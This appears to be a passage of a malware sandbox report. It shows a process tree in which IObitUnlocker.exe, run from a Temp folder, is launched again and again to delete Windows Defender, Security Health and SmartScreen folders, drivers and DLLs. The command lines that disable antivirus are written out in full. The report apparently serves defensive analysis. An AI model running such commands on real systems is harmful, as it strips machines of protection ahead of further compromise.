Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:4832
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:2836
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:5960
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:3344
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:5604
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:3560
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:404
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:2868
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:4440
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:5556
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
